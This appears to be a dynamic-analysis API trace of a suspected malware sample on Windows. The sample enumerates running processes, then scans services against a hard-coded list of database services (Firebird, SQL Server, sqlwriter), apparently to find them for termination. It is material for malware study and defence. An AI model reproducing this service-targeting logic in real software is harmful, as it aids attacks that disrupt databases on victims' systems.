	[0167.722] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0167.722] lstrlenW (lpString="spoolsv.exe") returned 11
	[0167.722] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0167.722] lstrlenW (lpString="svchost.exe") returned 11
	[0167.722] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0167.723] lstrlenW (lpString="taskhost.exe") returned 12
	[0167.723] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0167.723] lstrlenW (lpString="dwm.exe") returned 7
	[0167.723] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0167.723] lstrlenW (lpString="explorer.exe") returned 12
	[0167.723] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0167.724] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0167.724] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0167.724] lstrlenW (lpString="reader_sl.exe") returned 13
	[0167.724] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x608, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1c8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0167.725] lstrlenW (lpString="taskhost.exe") returned 12
	[0167.725] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x64c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x370, pcPriClassBase=13, dwFlags=0x0, szExeFile="consent.exe")) returned 1
	[0167.725] lstrlenW (lpString="consent.exe") returned 11
	[0167.725] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0167.725] lstrlenW (lpString="dllhost.exe") returned 11
	[0167.725] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0167.725] lstrlenW (lpString="dllhost.exe") returned 11
	[0167.726] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 1
	[0167.726] lstrlenW (lpString="rundll32.exe") returned 12
	[0167.726] Process32NextW (in: hSnapshot=0x3d0, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="rundll32.exe")) returned 0
	[0167.726] CloseHandle (hObject=0x3d0) returned 1
	[0167.726] Sleep (dwMilliseconds=0x1f4) 
	[0168.261] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb616c60
	[0168.262] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0168.262] GetLastError () returned 0xea
	[0168.262] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0x11e4) returned 0x7ba6360
	[0168.262] EnumServicesStatusExW (in: hSCManager=0xb616c60, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x7ba6360, cbBufSize=0x11e4, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x7ba6360, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0168.264] CloseServiceHandle (hSCObject=0xb616c60) returned 1
	[0168.265] lstrlenW (lpString="Appinfo") returned 7
	[0168.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1
	[0168.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1
	[0168.265] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1
	[0168.265] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0168.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0168.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0168.265] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0168.265] lstrlenW (lpString="AudioSrv") returned 8
	[0168.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0168.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0168.265] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0168.265] lstrlenW (lpString="BFE") returned 3
	[0168.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0168.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0168.265] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0168.265] lstrlenW (lpString="CryptSvc") returned 8
	[0168.265] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0168.265] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0168.265] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0168.266] lstrlenW (lpString="CscService") returned 10
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0168.266] lstrlenW (lpString="DcomLaunch") returned 10
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0168.266] lstrlenW (lpString="Dhcp") returned 4
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0168.266] lstrlenW (lpString="Dnscache") returned 8
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0168.266] lstrlenW (lpString="DPS") returned 3
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0168.266] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0168.266] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0168.266] lstrlenW (lpString="eventlog") returned 8
	[0168.266] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0168.266] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0168.267] lstrlenW (lpString="EventSystem") returned 11
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0168.267] lstrlenW (lpString="gpsvc") returned 5
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1
	[0168.267] lstrlenW (lpString="iphlpsvc") returned 8
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1
	[0168.267] lstrlenW (lpString="LanmanServer") returned 12
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1
	[0168.267] lstrlenW (lpString="LanmanWorkstation") returned 17
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1
	[0168.267] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1
	[0168.267] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1
	[0168.267] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1
	[0168.267] lstrlenW (lpString="lmhosts") returned 7
	[0168.267] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1
	[0168.267] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1
	[0168.268] lstrlenW (lpString="MMCSS") returned 5
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1
	[0168.268] lstrlenW (lpString="MpsSvc") returned 6
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1
	[0168.268] lstrlenW (lpString="Netman") returned 6
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Netman") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Netman") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="Netman") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="Netman") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Netman") returned 1
	[0168.268] lstrlenW (lpString="netprofm") returned 8
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1
	[0168.268] lstrlenW (lpString="NlaSvc") returned 6
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1
	[0168.268] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1
	[0168.268] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1
	[0168.268] lstrlenW (lpString="nsi") returned 3
	[0168.268] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1
	[0168.268] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1
	[0168.269] lstrlenW (lpString="PcaSvc") returned 6
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1
	[0168.269] lstrlenW (lpString="PlugPlay") returned 8
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1
	[0168.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1
	[0168.269] lstrlenW (lpString="Power") returned 5
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1
	[0168.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1
	[0168.269] lstrlenW (lpString="ProfSvc") returned 7
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1
	[0168.269] lstrlenW (lpString="RpcEptMapper") returned 12
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0168.269] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1
	[0168.269] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1
	[0168.269] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1
	[0168.269] lstrlenW (lpString="RpcSs") returned 5
	[0168.269] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1
	[0168.270] lstrlenW (lpString="SamSs") returned 5
	[0168.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1
	[0168.270] lstrlenW (lpString="Schedule") returned 8
	[0168.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1
	[0168.270] lstrlenW (lpString="SENS") returned 4
	[0168.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1
	[0168.270] lstrlenW (lpString="ShellHWDetection") returned 16
	[0168.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1
	[0168.270] lstrlenW (lpString="Spooler") returned 7
	[0168.270] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1
	[0168.270] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1
	[0168.270] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1
	[0168.270] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1
	[0168.270] lstrlenW (lpString="SysMain") returned 7
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1
	[0168.271] lstrlenW (lpString="Themes") returned 6
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0168.271] lstrlenW (lpString="TrkWks") returned 6
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="TrkWks") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="TrkWks") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="TrkWks") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="TrkWks") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="TrkWks") returned -1
	[0168.271] lstrlenW (lpString="UxSms") returned 5
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0168.271] lstrlenW (lpString="WdiServiceHost") returned 14
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiServiceHost") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiServiceHost") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiServiceHost") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiServiceHost") returned -1
	[0168.271] lstrlenW (lpString="WdiSystemHost") returned 13
	[0168.271] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0168.271] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WdiSystemHost") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlwriter", lpString2="WdiSystemHost") returned -1
	[0168.271] lstrcmpiW (lpString1="mssqlserver", lpString2="WdiSystemHost") returned -1
	[0168.271] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WdiSystemHost") returned -1
	[0168.272] lstrlenW (lpString="WinHttpAutoProxySvc") returned 19
	[0168.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlwriter", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.272] lstrcmpiW (lpString1="mssqlserver", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="WinHttpAutoProxySvc") returned -1
	[0168.272] lstrlenW (lpString="Winmgmt") returned 7
	[0168.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Winmgmt") returned -1
	[0168.272] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Winmgmt") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlwriter", lpString2="Winmgmt") returned -1
	[0168.272] lstrcmpiW (lpString1="mssqlserver", lpString2="Winmgmt") returned -1
	[0168.272] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Winmgmt") returned -1
	[0168.272] lstrlenW (lpString="WPDBusEnum") returned 10
	[0168.272] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="WPDBusEnum") returned -1
